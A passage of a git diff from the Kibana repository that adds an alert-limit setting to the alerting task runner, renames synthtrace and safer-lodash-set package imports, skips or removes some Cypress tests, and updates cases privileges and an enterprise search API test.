kibanaBaseUrl: 'https://localhost:5601', supportsEphemeralTasks: false, maxEphemeralActionsPerRule: 10, + maxAlerts: 1000, cancelAlertsOnRuleTimeout: true, usageCounter: mockUsageCounter, actionsConfigMap: { @@ -414,7 +415,7 @@ describe('Task Runner Cancel', () => { ); expect(logger.debug).nthCalledWith( 7, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); } @@ -428,6 +429,7 @@ describe('Task Runner Cancel', () => { status, logAlert = 0, logAction = 0, + hasReachedAlertLimit = false, }: { status: string; ruleContext?: RuleContextOpts; @@ -439,6 +441,7 @@ describe('Task Runner Cancel', () => { setRuleName?: boolean; logAlert?: number; logAction?: number; + hasReachedAlertLimit?: boolean; }) { expect(alertingEventLogger.initialize).toHaveBeenCalledWith(ruleContext); expect(alertingEventLogger.start).toHaveBeenCalled(); @@ -455,6 +458,7 @@ describe('Task Runner Cancel', () => { numberOfRecoveredAlerts: recoveredAlerts, numberOfTriggeredActions: triggeredActions, totalSearchDurationMs: 23423, + hasReachedAlertLimit, triggeredActionsStatus: 'complete', }, status: { diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts index e787617800356..9ecc361ca4af4 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts @@ -98,6 +98,7 @@ describe('Task Runner Factory', () => { kibanaBaseUrl: 'https://localhost:5601', supportsEphemeralTasks: true, maxEphemeralActionsPerRule: 10, + maxAlerts: 1000, cancelAlertsOnRuleTimeout: true, executionContext, usageCounter: mockUsageCounter, diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts index 09fe8cb030c40..a5ca6973cda27 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts @@ -53,6 +53,7 @@ export interface TaskRunnerContext { kibanaBaseUrl: string | undefined; supportsEphemeralTasks: boolean; maxEphemeralActionsPerRule: number; + maxAlerts: number; actionsConfigMap: ActionsConfigMap; cancelAlertsOnRuleTimeout: boolean; usageCounter?: UsageCounter; diff --git a/x-pack/plugins/alerting/server/types.ts b/x-pack/plugins/alerting/server/types.ts index 870eeffe6553d..efce3583e1879 100644 --- a/x-pack/plugins/alerting/server/types.ts +++ b/x-pack/plugins/alerting/server/types.ts @@ -80,6 +80,7 @@ export interface RuleExecutorServices< scopedClusterClient: IScopedClusterClient; alertFactory: { create: (id: string) => PublicAlert; + hasReachedAlertLimit: () => boolean; done: () => AlertFactoryDoneUtils; }; shouldWriteAlerts: () => boolean; diff --git a/x-pack/plugins/apm/dev_docs/local_setup.md b/x-pack/plugins/apm/dev_docs/local_setup.md index 24a8db44a3cce..9f3553f3c680c 100644 --- a/x-pack/plugins/apm/dev_docs/local_setup.md +++ b/x-pack/plugins/apm/dev_docs/local_setup.md @@ -44,7 +44,7 @@ elasticsearch.username: kibana_system elasticsearch.password: changeme ``` -Documentation for [Synthtrace](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/README.md) +Documentation for [Synthtrace](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/README.md) ## 2. Cloud-based ES Cluster (internal devs only) diff --git a/x-pack/plugins/apm/dev_docs/testing.md b/x-pack/plugins/apm/dev_docs/testing.md index b3eabc27a515b..c204a3922139f 100644 --- a/x-pack/plugins/apm/dev_docs/testing.md +++ b/x-pack/plugins/apm/dev_docs/testing.md @@ -63,7 +63,7 @@ node scripts/test/api --runner --basic --updateSnapshots **API Test tips** -- For data generation in API tests have a look at the [elastic-apm-synthtrace](../../../../packages/elastic-apm-synthtrace/README.md) package +- For data generation in API tests have a look at the [kbn-apm-synthtrace](../../../../packages/kbn-apm-synthtrace/README.md) package - For debugging access Elasticsearch on http://localhost:9220 and Kibana on http://localhost:5620 (`elastic` / `changeme`) --- @@ -124,4 +124,4 @@ All files with a .stories.tsx extension will be loaded. You can access the devel For end-to-end (e.g. agent -> apm server -> elasticsearch <- kibana) development and testing of Elastic APM please check the the [APM Integration Testing repository](https://github.com/elastic/apm-integration-testing). -Data can also be generated using the [elastic-apm-synthtrace](../../../../packages/elastic-apm-synthtrace/README.md) CLI. +Data can also be generated using the [kbn-apm-synthtrace](../../../../packages/kbn-apm-synthtrace/README.md) CLI. diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts b/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts index 1d0155bf9b434..1be9873d25c4f 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function opbeans({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts index d3ac4cc0e095f..1a58eb1ca4fda 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts @@ -10,7 +10,7 @@ import { opbeans } from '../../../fixtures/synthtrace/opbeans'; const start = '2021-10-10T00:00:00.000Z'; const end = '2021-10-10T00:15:00.000Z'; -describe('Comparison feature flag', () => { +describe.skip('Comparison feature flag', () => { before(async () => { await synthtrace.index( opbeans({ diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts deleted file mode 100644 index 99178c810067e..0000000000000 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { synthtrace } from '../../../../synthtrace'; -import { opbeans } from '../../../fixtures/synthtrace/opbeans'; - -const serviceOverviewPath = '/app/apm/services/opbeans-python/overview'; - -const start = '2021-10-10T00:00:00.000Z'; -const end = '2021-10-10T00:15:00.000Z'; - -describe('Infrastracture feature flag', () => { - before(async () => { - await synthtrace.index( - opbeans({ - from: new Date(start).getTime(), - to: new Date(end).getTime(), - }) - ); - }); - - after(async () => { - await synthtrace.clean(); - }); - - describe('when infrastracture feature is enabled', () => { - beforeEach(() => { - cy.loginAsEditorUser().then(() => { - // enables infrastructure view feature on advanced settings - cy.updateAdvancedSettings({ - 'observability:enableInfrastructureView': true, - }); - }); - }); - - it('shows infrastructure tab in service overview page', () => { - cy.visit(serviceOverviewPath); - cy.contains('a[role="tab"]', 'Infrastructure'); - }); - }); - - describe('when infrastracture feature is disabled', () => { - beforeEach(() => { - cy.loginAsEditorUser().then(() => { - // enables infrastructure view feature on advanced settings - cy.updateAdvancedSettings({ - 'observability:enableInfrastructureView': false, - }); - }); - }); - - it('hides infrastructure tab in service overview page', () => { - cy.visit(serviceOverviewPath); - cy.contains('a[role="tab"]', 'Infrastructure').should('not.exist'); - }); - }); -}); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts index 1399875791417..52cf6b988f1a1 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts index 65f76f7cfd95c..46d654ef2a4aa 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts @@ -27,7 +27,7 @@ const nodeServiceInfraPageHref = url.format({ query: { rangeFrom: start, rangeTo: end }, }); -describe('Infrastructure page', () => { +describe.skip('Infrastructure page', () => { before(async () => { await synthtrace.index( generateData({ diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts index 4661ea67ae2ab..a2f5e055e80a8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; import url from 'url'; import { synthtrace } from '../../../../synthtrace'; diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts index 66a70428b2275..56978f03123a8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts index 4fc94d2305b57..e3cdf7e8bbce8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateMultipleServicesData({ from, diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts index 94b7ab52f6f70..243f1df257a4f 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts index 68dc3f62b5c12..bbd7553d1fa33 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; const dataConfig = { serviceName: 'synth-python', diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts index 3905cf324c44a..0ced34d8a1b7c 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, EntityArrayIterable, timerange } from '@elastic/apm-synthtrace'; +import { apm, EntityArrayIterable, timerange } from '@kbn/apm-synthtrace'; import { synthtrace } from '../../../../synthtrace'; import { SpanLink } from '../../../../../typings/es_schemas/raw/fields/span_links'; diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts b/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts index 25b29e080b2c2..54622cb59bd5e 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts @@ -9,7 +9,7 @@ import { createLogger, EntityArrayIterable, LogLevel, -} from '@elastic/apm-synthtrace'; +} from '@kbn/apm-synthtrace'; import { createEsClientForTesting } from '@kbn/test'; // *********************************************************** diff --git a/x-pack/plugins/apm/ftr_e2e/synthtrace.ts b/x-pack/plugins/apm/ftr_e2e/synthtrace.ts index de113c6c44c4d..6fb880c40b0cc 100644 --- a/x-pack/plugins/apm/ftr_e2e/synthtrace.ts +++ b/x-pack/plugins/apm/ftr_e2e/synthtrace.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import type { EntityIterable } from '@elastic/apm-synthtrace'; +import type { EntityIterable } from '@kbn/apm-synthtrace'; export const synthtrace = { index: (events: EntityIterable) => diff --git a/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx b/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx index 55b486f5ae366..ff8442016adc5 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx @@ -9,7 +9,7 @@ import { EuiPageHeaderProps } from '@elastic/eui'; import React from 'react'; import { useLocation } from 'react-router-dom'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { enableServiceGroups } from '@kbn/observability-plugin/public'; import { EnvironmentsContextProvider } from '../../../context/environments_context/environments_context'; import { useFetcher, FETCH_STATUS } from '../../../hooks/use_fetcher'; diff --git a/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx b/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx index 7acf14fc0bf01..c6c4c405d11af 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx @@ -14,7 +14,6 @@ import { import { i18n } from '@kbn/i18n'; import { omit } from 'lodash'; import React from 'react'; -import { enableInfrastructureView } from '@kbn/observability-plugin/public'; import { isMobileAgentName, isJavaAgentName, @@ -177,8 +176,6 @@ function useTabs({ selectedTab }: { selectedTab: Tab['key'] }) { capabilities ); - const showInfraTab = core.uiSettings.get(enableInfrastructureView); - const router = useApmRouter(); const { @@ -269,8 +266,6 @@ function useTabs({ selectedTab }: { selectedTab: Tab['key'] }) { label: i18n.translate('xpack.apm.home.infraTabLabel', { defaultMessage: 'Infrastructure', }), - - hidden: !showInfraTab, }, { key: 'service-map', diff --git a/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts b/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts index 4e4c90b4cfeac..9a36431b1f825 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts +++ b/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts @@ -6,7 +6,7 @@ */ import { i18n } from '@kbn/i18n'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; export function getNoDataConfig({ docsLink, @@ -22,7 +22,7 @@ export function getNoDataConfig({ basePath?: string; hasApmData?: boolean; hasApmIntegrations?: boolean; -}): KibanaPageTemplateProps['noDataConfig'] { +}): NoDataConfig | undefined { // don't show "no data screen" when there is APM data or it should be bypassed if (hasApmData || shouldBypassNoDataScreen || loading) { return; diff --git a/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx b/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx index a891ab9bdcdce..1eece05eb8843 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx @@ -16,7 +16,7 @@ import { import React from 'react'; import { i18n } from '@kbn/i18n'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { enableServiceGroups } from '@kbn/observability-plugin/public'; import { useFetcher, FETCH_STATUS } from '../../../hooks/use_fetcher'; import { ApmPluginStartDeps } from '../../../plugin'; diff --git a/x-pack/plugins/apm/readme.md b/x-pack/plugins/apm/readme.md index df7b641fbb231..fb7cf20732bf3 100644 --- a/x-pack/plugins/apm/readme.md +++ b/x-pack/plugins/apm/readme.md @@ -13,7 +13,7 @@ ## Tooling - [VSCode setup instructions](./dev_docs/vscode_setup.md) - [Github PR commands](./dev_docs/github_commands.md) -- [Synthtrace (data generation)](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/README.md) +- [Synthtrace (data generation)](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/README.md) - [Query debugging in development and production](./dev_docs/query_debugging_in_development_and_production.md) ## Other resources diff --git a/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts b/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts index f9aa943b5eceb..a48da0f4577cc 100644 --- a/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts +++ b/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts @@ -8,7 +8,7 @@ import { argv } from 'yargs'; import pLimit from 'p-limit'; import pRetry from 'p-retry'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { uniq, without, merge, flatten } from 'lodash'; import * as histogram from 'hdr-histogram-js'; import { diff --git a/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx b/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx index 9150b78f6000a..256d33a8e7a78 100644 --- a/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx +++ b/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx @@ -7,7 +7,7 @@ import { Dispatch } from 'redux'; import { connect } from 'react-redux'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { fromExpression, toExpression } from '@kbn/interpreter'; diff --git a/x-pack/plugins/canvas/public/expression_types/arg_types/font.js b/x-pack/plugins/canvas/public/expression_types/arg_types/font.js index 1ec6ba77685ef..d1e71fb59bf4d 100644 --- a/x-pack/plugins/canvas/public/expression_types/arg_types/font.js +++ b/x-pack/plugins/canvas/public/expression_types/arg_types/font.js @@ -8,7 +8,7 @@ import React from 'react'; import PropTypes from 'prop-types'; import { get, mapValues } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { openSans } from '../../../common/lib/fonts'; import { templateFromReactComponent } from '../../lib/template_from_react_component'; import { TextStylePicker } from '../../components/text_style_picker'; diff --git a/x-pack/plugins/canvas/public/functions/plot/index.ts b/x-pack/plugins/canvas/public/functions/plot/index.ts index 5880d833c5be1..cc2a893777c2e 100644 --- a/x-pack/plugins/canvas/public/functions/plot/index.ts +++ b/x-pack/plugins/canvas/public/functions/plot/index.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { groupBy, get, keyBy, map, sortBy } from 'lodash'; import { ExpressionFunctionDefinition, Style } from '@kbn/expressions-plugin/common'; import type { PaletteRegistry, PaletteOutput } from '@kbn/coloring'; diff --git a/x-pack/plugins/canvas/shareable_runtime/api/index.ts b/x-pack/plugins/canvas/shareable_runtime/api/index.ts index ad9e4fcf03cdc..52e0f81f87e91 100644 --- a/x-pack/plugins/canvas/shareable_runtime/api/index.ts +++ b/x-pack/plugins/canvas/shareable_runtime/api/index.ts @@ -6,7 +6,7 @@ */ import 'core-js/stable'; -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; import 'whatwg-fetch'; import 'jquery'; import '@kbn/flot-charts'; diff --git a/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx b/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx index 22dd3fcbd711e..e3864086a85dd 100644 --- a/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx +++ b/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx @@ -9,7 +9,7 @@ import React from 'react'; import { createStore } from 'redux'; import { Provider as ReduxProvider } from 'react-redux'; import { cloneDeep } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { CanvasWorkpad, CanvasElement, CanvasAsset, CanvasPage } from '../../types'; diff --git a/x-pack/plugins/cases/public/client/attachment_framework/types.ts b/x-pack/plugins/cases/public/client/attachment_framework/types.ts index 1f974d09c887f..2f8d7eacb0553 100644 --- a/x-pack/plugins/cases/public/client/attachment_framework/types.ts +++ b/x-pack/plugins/cases/public/client/attachment_framework/types.ts @@ -12,10 +12,8 @@ import { CommentRequestPersistableStateType, } from '../../../common/api'; import { Case } from '../../containers/types'; -import { SupportedUserActionTypes } from '../../components/user_actions/types'; export interface AttachmentViewObject { - type?: SupportedUserActionTypes; timelineAvatar?: EuiCommentProps['timelineAvatar']; actions?: EuiCommentProps['actions']; event?: EuiCommentProps['event']; diff --git a/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx b/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx index cd91d75b4062d..9b003c373873b 100644 --- a/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx +++ b/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx @@ -90,7 +90,6 @@ export const createRegisteredAttachmentUserActionBuilder = < fullName={comment.createdBy.fullName} /> ), - type: attachmentViewObject.type, className: `comment-${comment.type}-attachment-${attachmentTypeId}`, event: attachmentViewObject.event, 'data-test-subj': `comment-${comment.type}-${attachmentTypeId}`, diff --git a/x-pack/plugins/cases/server/features.ts b/x-pack/plugins/cases/server/features.ts index f4e502912a2a6..d2ddc6a1030a0 100644 --- a/x-pack/plugins/cases/server/features.ts +++ b/x-pack/plugins/cases/server/features.ts @@ -38,7 +38,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { cases: [APP_ID], privileges: { all: { - api: ['casesSuggestUserProfiles'], + api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'], cases: { create: [APP_ID], read: [APP_ID], @@ -55,6 +55,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { ui: capabilities.all, }, read: { + api: ['bulkGetUserProfiles'], cases: { read: [APP_ID], }, diff --git a/x-pack/plugins/cases/server/services/so_reference_extractor.ts b/x-pack/plugins/cases/server/services/so_reference_extractor.ts index 622cce373e755..27fdf17b5f727 100644 --- a/x-pack/plugins/cases/server/services/so_reference_extractor.ts +++ b/x-pack/plugins/cases/server/services/so_reference_extractor.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { SavedObject, SavedObjectReference, SavedObjectsUpdateResponse } from '@kbn/core/server'; diff --git a/x-pack/plugins/enterprise_search/common/types/analytics.ts b/x-pack/plugins/enterprise_search/common/types/analytics.ts new file mode 100644 index 0000000000000..e75617645a139 --- /dev/null +++ b/x-pack/plugins/enterprise_search/common/types/analytics.ts @@ -0,0 +1,14 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export interface AnalyticsCollection { + id: string; + name: string; + event_retention_day_length: number; +} + +export type AnalyticsCollectionDocument = Omit; diff --git a/x-pack/plugins/enterprise_search/common/types/error_codes.ts b/x-pack/plugins/enterprise_search/common/types/error_codes.ts index 327d000003f9b..46a787ae257ec 100644 --- a/x-pack/plugins/enterprise_search/common/types/error_codes.ts +++ b/x-pack/plugins/enterprise_search/common/types/error_codes.ts @@ -6,6 +6,7 @@ */ export enum ErrorCode { + ANALYTICS_COLLECTION_ALREADY_EXISTS = 'analytics_collection_already_exists', CONNECTOR_DOCUMENT_ALREADY_EXISTS = 'connector_document_already_exists', CRAWLER_ALREADY_EXISTS = 'crawler_already_exists', INDEX_ALREADY_EXISTS = 'index_already_exists', diff --git a/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts b/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts index e65f0a542ada5..0a4524ef06d71 100644 --- a/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts +++ b/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts @@ -20,6 +20,10 @@ export const mockKibanaValues = { }, history: mockHistory, navigateToUrl: jest.fn(), + productAccess: { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: true, + }, security: securityMock.createStart(), setBreadcrumbs: jest.fn(), setChromeIsVisible: jest.fn(), diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts index fb0162c8aec15..e9250c14f171d 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts @@ -19,7 +19,7 @@ describe('SearchDocumentsApiLogic', () => { describe('searchDocuments', () => { it('calls correct api', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ indexName: 'indexName', pagination: { @@ -28,15 +28,18 @@ describe('SearchDocumentsApiLogic', () => { }, }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( + expect(http.post).toHaveBeenCalledWith( '/internal/enterprise_search/indices/indexName/search', - { query: { page: 0, size: 10 } } + { + body: JSON.stringify({}), + query: { page: 0, size: 10 }, + } ); await expect(result).resolves.toEqual('result'); }); it('calls correct api with query set', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ indexName: 'düsseldorf', pagination: { @@ -46,15 +49,20 @@ describe('SearchDocumentsApiLogic', () => { query: 'abcd', }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( - '/internal/enterprise_search/indices/d%C3%BCsseldorf/search/abcd', - { query: { page: 0, size: 10 } } + expect(http.post).toHaveBeenCalledWith( + '/internal/enterprise_search/indices/d%C3%BCsseldorf/search', + { + body: JSON.stringify({ + searchQuery: 'abcd', + }), + query: { page: 0, size: 10 }, + } ); await expect(result).resolves.toEqual('result'); }); it('calls with correct pageSize with docsPerPage set', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ docsPerPage: 25, indexName: 'indexName', @@ -64,9 +72,12 @@ describe('SearchDocumentsApiLogic', () => { }, }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( + expect(http.post).toHaveBeenCalledWith( '/internal/enterprise_search/indices/indexName/search', - { query: { page: 0, size: 25 } } + { + body: JSON.stringify({}), + query: { page: 0, size: 25 }, + } ); await expect(result).resolves.toEqual('result'); }); diff --git 